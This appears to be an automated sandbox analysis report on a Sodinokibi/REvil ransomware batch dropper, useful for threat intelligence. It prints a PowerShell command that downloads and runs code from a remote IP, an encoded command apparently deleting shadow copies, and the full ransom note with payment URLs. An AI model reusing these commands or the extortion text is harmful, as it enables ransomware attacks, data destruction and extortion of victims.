Analysis

  • max time kernel
    62s
  • max time network
    71s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    19-08-2020 19:10

General

  • Target

    82d5933a7fe8497bb64008a8ad2bdaa6.bat

  • Size

    220B

  • MD5

    613e281b75ac4b2fdf68a543bf8e3910

  • SHA1

    04cba786c3f966f0b61a930155de7ccfb85e5edb

  • SHA256

    697fd96092e104056ff21a7acab7b07da036f4e8d6cb9f672814b51be95591ed

  • SHA512

    389ba3e5b8d2188f3d1b6acb152607b567c815869ef0435e55e9eaa3ee93e31a692cc647369e21786c56bdd178bc6413f881abfcc2c8b5b38493891a86907dcb

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6

Extracted

Path

C:\ml005-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ml005. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/140?s=61908812b95c5ff1176e968733afaf55 [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2A37A62126565D9D 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/2A37A62126565D9D Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: JifyahV+KukkXEJrshYHWAUsiKnZsoSD8MxEY4C4BsiBp5Kw0FxvxV7wSmPPIRc7 KEXmLea+x4xzXnZGv2UsKdhZsVexxpb5QXhi5ND3EKOrk2dcal4cy9s3m9G2/zbu QhguWLvyE4ZJ9rB8kE4O9D6QsQvgF65/fHkq/URqBq4xhlsgcMj2jbXI+Nuw3NII bqTm5BvuB7S7gK7IDyQUxfhesgsjARX8oXAWHCwI3qYC0Qyinb3EKPALoZv4JofG b+rYAX/rDqwz+1bKlZlbeIsb7Sfr8uVRF8H3mOeSfJt01mtan5eZlmHcncScE4De CDNovMvhskar8Drtv+j/wg7ZbhC8jqzDSbZvw/wu/7bCAFcdu7/UngBBFrAUf+q6 GDYJH3+YNTkKzTd8ngCiUZ6SA7gZXYyIbJQdYHen8KV0Bbn1qgVX27hP8mTXm4Oy Cf1ylM/lWl2SQ4P2T7V0JzDu8UXmNzn2XiM6yZ8LlPULIzaeOS1O9gJEZTBYOheD XkNrKiFMJqTdoEx4keUMtv7BRV8v1Lh09Z69wWUoe3DHihGTM4+ZNUxNojY64dw3 aZGGsNRfsgMAKEo/EnRR7ozQTNQLRw5tu6FYuY2y2V/mxP+RASEeqsY2N+UFFjug n3SBRsPqjloK7KYUN0KF+suRoEnqWznrX/g+9ilCooT+milTkOpJ/ioaGi+MEkby 0wQKbqW/LEHX48hPEQ6I2OvKkcmRRwDY/mbxcx5tZdtwQTiPS66HdFHdQp3rV5iQ 8wm2F2n/QXQB3K3Ywel/ke2ohK48Cpc0UTReWlIESqaT97F3/aQwiId//m/0Tc3g C7nV9yIfQXxj6zHh5Nf1PM9SKPfcH+hDdveQVJ33mNHSh8mS1LXPDtgV3Gh+R7Qw DRevIRxL9sTCArA/BJEtuK3lJ0WXJzFDUzcjFlLL+CXVrD+yEdALm6Ln8K7kMreM KnNk1k2WPVPCJq3NaxxCCLXWpYe1aHetsH6gRo05Mrddj9V4JwlCQras5XX9Nihb mNf0RYE24TeCCpbqzYFoOkwvt3pQjjjo4Gmthbe6nt7XUglfxLTCNYbxk2onu0qa UfmAN0wy7VZzaTVHrtJv4C02Z7BxxXGECJYCLPbbwTCVNGvs3rYhaD1/BcOt0nyE pmEAQj+ViqMplMucGHUuF5jJoo3iEryBaoYs6QiKmbBA13PV/mwutfACPl1ENre4 h8Iqn07mXDbWaiqfKgjREFFieSq3ZeEf3Dv7ZdEJlB/86OZNjT8+HFu6WQV+JOTy batV1ciEKfmkJUnVgXG2OcI2P0d6ysZtgGSHIvyk ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/2A37A62126565D9D

http://decryptor.cc/2A37A62126565D9D

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 2 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 4 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Drops file in Program Files directory 40 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\82d5933a7fe8497bb64008a8ad2bdaa6.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1516
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6');Invoke-LIEITOMPTWTBU;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1676
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1828
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1280

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_478c05f3-b801-4912-91bd-47646e127596

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4fd4a7fe-82f5-41e4-888c-1b7eac83ece7

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_a2ebb337-3027-47ef-8098-8d2e9f7615cf

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ca37ad88-4ce8-48e7-a2ed-ec10658dba29

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e10aa6dc-f3ff-45e4-9eec-4fef42847693

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e1dd9aab-0fd1-4532-ba7f-00569c2741ef

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

  • memory/1676-5-0x0000000004850000-0x0000000004851000-memory.dmp

    Filesize

    4KB

  • memory/1676-21-0x00000000057F0000-0x00000000057F1000-memory.dmp

    Filesize

    4KB

  • memory/1676-22-0x00000000063B0000-0x00000000063B1000-memory.dmp

    Filesize

    4KB

  • memory/1676-14-0x0000000006250000-0x0000000006251000-memory.dmp

    Filesize

    4KB

  • memory/1676-13-0x0000000005670000-0x0000000005671000-memory.dmp

    Filesize

    4KB

  • memory/1676-8-0x0000000005600000-0x0000000005601000-memory.dmp

    Filesize

    4KB

  • memory/1676-0-0x0000000000000000-mapping.dmp

  • memory/1676-4-0x0000000001FC0000-0x0000000001FC1000-memory.dmp

    Filesize

    4KB

  • memory/1676-3-0x00000000048E0000-0x00000000048E1000-memory.dmp

    Filesize

    4KB

  • memory/1676-2-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

    Filesize

    4KB

  • memory/1676-1-0x0000000074820000-0x0000000074F0E000-memory.dmp

    Filesize

    6.9MB

  • memory/1828-23-0x0000000000000000-mapping.dmp

  • memory/1828-25-0x0000000074820000-0x0000000074F0E000-memory.dmp

    Filesize

    6.9MB